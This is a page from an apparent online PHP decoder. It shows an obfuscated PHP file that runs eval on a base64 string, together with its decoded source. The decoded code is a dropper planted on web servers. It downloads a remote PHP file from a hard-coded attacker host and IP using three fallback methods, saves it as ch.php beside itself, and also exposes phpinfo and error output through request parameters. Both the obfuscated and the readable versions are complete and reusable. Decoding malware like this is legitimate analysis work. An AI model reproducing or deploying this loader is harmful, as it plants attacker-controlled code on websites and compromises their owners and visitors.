Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? $QEC371B6E7080FFAE94C95A6268D1FC93="aWYoaXNzZXQoJF9SRVFVRVNUWyJlcnJvcnMiXSkgJiYgJF9SRVF..

Decoded Output download

if(isset($_REQUEST["errors"]) && $_REQUEST["errors"] == "true")
{	error_reporting(E_ALL); ini_set("display_errors", true); }

if(isset($_REQUEST["phpinfo"]) && $_REQUEST["phpinfo"] == "true")
{   phpinfo(); exit(); }

$filesent = "";
$ip = "193.169.188.71"; // IP OF SERVER
$host = "dqxu.com"; // HOST WITHOUT HTTP
$path = "/se/ch.php_"; // PATH TO FILE 


if(!isset($_REQUEST["g"]))
{ $filesent = file_get_contents("http://{$host}{$path}"); }

if(empty($filesent) && function_exists("curl_init") && !isset($_REQUEST["c"]))
{
	$ch = curl_init(); 
	curl_setopt($ch, CURLOPT_URL, "http://{$host}{$path}");
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	$filesent = curl_exec($ch);
	if(curl_errno($ch)!== 0)
		echo curl_error($ch);
	curl_close($ch);

}

if(empty($filesent) && function_exists("fsockopen") && !isset($_REQUEST["s"]))
{
	$out_head = "";

	$fp = fsockopen($ip, 80, $errno, $errstr, 30);
	if (!$fp) {
	    echo "$errstr ($errno)<br />
";
	} else {
	    $out_head = "GET /{$path}/ HTTP/1.1
Host: {$host}
Connection: Close

";
	    fwrite($fp, $out_head);
	    while (!feof($fp)) {
	        $filesent .= fgets($fp, 128);
	    }
	    fclose($fp);
	}
	$filesent = substr($filesent, strpos($filesent, "

") + 4, strlen($filesent));

}


if(!empty($filesent)){

	$fsmart = fopen(dirname(__FILE__)."/ch.php", "w+");
if($fsmart === false)
{
echo "<!--ERROR-->";
}
else{	fwrite($fsmart, $filesent);
	fclose($fsmart);
	$ftime = date("H:i:s, d/m/Y", filemtime(dirname(__FILE__)."/ch.php"));	
	print($ftime);
echo "<!--SUCCESS-->"; 
}
}
else { echo "<!--ERROR-->"; }

Did this file decode correctly?

Original Code

<? $QEC371B6E7080FFAE94C95A6268D1FC93="aWYoaXNzZXQoJF9SRVFVRVNUWyJlcnJvcnMiXSkgJiYgJF9SRVFVRVNUWyJlcnJvcnMiXSA9PSAidHJ1ZSIpDQp7CWVycm9yX3JlcG9ydGluZyhFX0FMTCk7IGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgdHJ1ZSk7IH0NCg0KaWYoaXNzZXQoJF9SRVFVRVNUWyJwaHBpbmZvIl0pICYmICRfUkVRVUVTVFsicGhwaW5mbyJdID09ICJ0cnVlIikNCnsgICBwaHBpbmZvKCk7IGV4aXQoKTsgfQ0KDQokZmlsZXNlbnQgPSAiIjsNCiRpcCA9ICIxOTMuMTY5LjE4OC43MSI7IC8vIElQIE9GIFNFUlZFUg0KJGhvc3QgPSAiZHF4dS5jb20iOyAvLyBIT1NUIFdJVEhPVVQgSFRUUA0KJHBhdGggPSAiL3NlL2NoLnBocF8iOyAvLyBQQVRIIFRPIEZJTEUgDQoNCg0KaWYoIWlzc2V0KCRfUkVRVUVTVFsiZyJdKSkNCnsgJGZpbGVzZW50ID0gZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly97JGhvc3R9eyRwYXRofSIpOyB9DQoNCmlmKGVtcHR5KCRmaWxlc2VudCkgJiYgZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSAmJiAhaXNzZXQoJF9SRVFVRVNUWyJjIl0pKQ0Kew0KCSRjaCA9IGN1cmxfaW5pdCgpOyANCgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAiaHR0cDovL3skaG9zdH17JHBhdGh9Iik7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCB0cnVlKTsNCgkkZmlsZXNlbnQgPSBjdXJsX2V4ZWMoJGNoKTsNCglpZihjdXJsX2Vycm5vKCRjaCkhPT0gMCkNCgkJZWNobyBjdXJsX2Vycm9yKCRjaCk7DQoJY3VybF9jbG9zZSgkY2gpOw0KDQp9DQoNCmlmKGVtcHR5KCRmaWxlc2VudCkgJiYgZnVuY3Rpb25fZXhpc3RzKCJmc29ja29wZW4iKSAmJiAhaXNzZXQoJF9SRVFVRVNUWyJzIl0pKQ0Kew0KCSRvdXRfaGVhZCA9ICIiOw0KDQoJJGZwID0gZnNvY2tvcGVuKCRpcCwgODAsICRlcnJubywgJGVycnN0ciwgMzApOw0KCWlmICghJGZwKSB7DQoJICAgIGVjaG8gIiRlcnJzdHIgKCRlcnJubyk8YnIgLz5cbiI7DQoJfSBlbHNlIHsNCgkgICAgJG91dF9oZWFkID0gIkdFVCAveyRwYXRofS8gSFRUUC8xLjFcclxuSG9zdDogeyRob3N0fVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsNCgkgICAgZndyaXRlKCRmcCwgJG91dF9oZWFkKTsNCgkgICAgd2hpbGUgKCFmZW9mKCRmcCkpIHsNCgkgICAgICAgICRmaWxlc2VudCAuPSBmZ2V0cygkZnAsIDEyOCk7DQoJICAgIH0NCgkgICAgZmNsb3NlKCRmcCk7DQoJfQ0KCSRmaWxlc2VudCA9IHN1YnN0cigkZmlsZXNlbnQsIHN0cnBvcygkZmlsZXNlbnQsICJcclxuXHJcbiIpICsgNCwgc3RybGVuKCRmaWxlc2VudCkpOw0KDQp9DQoNCg0KaWYoIWVtcHR5KCRmaWxlc2VudCkpew0KDQoJJGZzbWFydCA9IGZvcGVuKGRpcm5hbWUoX19GSUxFX18pLiIvY2gucGhwIiwgIncrIik7DQppZigkZnNtYXJ0ID09PSBmYWxzZSkNCnsNCmVjaG8gIjwhLS1FUlJPUi0tPiI7DQp9DQplbHNlewlmd3JpdGUoJGZzbWFydCwgJGZpbGVzZW50KTsNCglmY2xvc2UoJGZzbWFydCk7DQoJJGZ0aW1lID0gZGF0ZSgiSDppOnMsIGQvbS9ZIiwgZmlsZW10aW1lKGRpcm5hbWUoX19GSUxFX18pLiIvY2gucGhwIikpOwkNCglwcmludCgkZnRpbWUpOw0KZWNobyAiPCEtLVNVQ0NFU1MtLT4iOyANCn0NCn0NCmVsc2UgeyBlY2hvICI8IS0tRVJST1ItLT4iOyB9"; eval(base64_decode($QEC371B6E7080FFAE94C95A6268D1FC93));?>

Function Calls

base64_decode 1

Variables

$QEC371B6E7080FFAE94C95A6268D1FC93 aWYoaXNzZXQoJF9SRVFVRVNUWyJlcnJvcnMiXSkgJiYgJF9SRVFVRVNUWyJl..

Stats

MD5 ec329c3df31bc8d03ba4794a87c18e4e
Eval Count 1
Decode Time 89 ms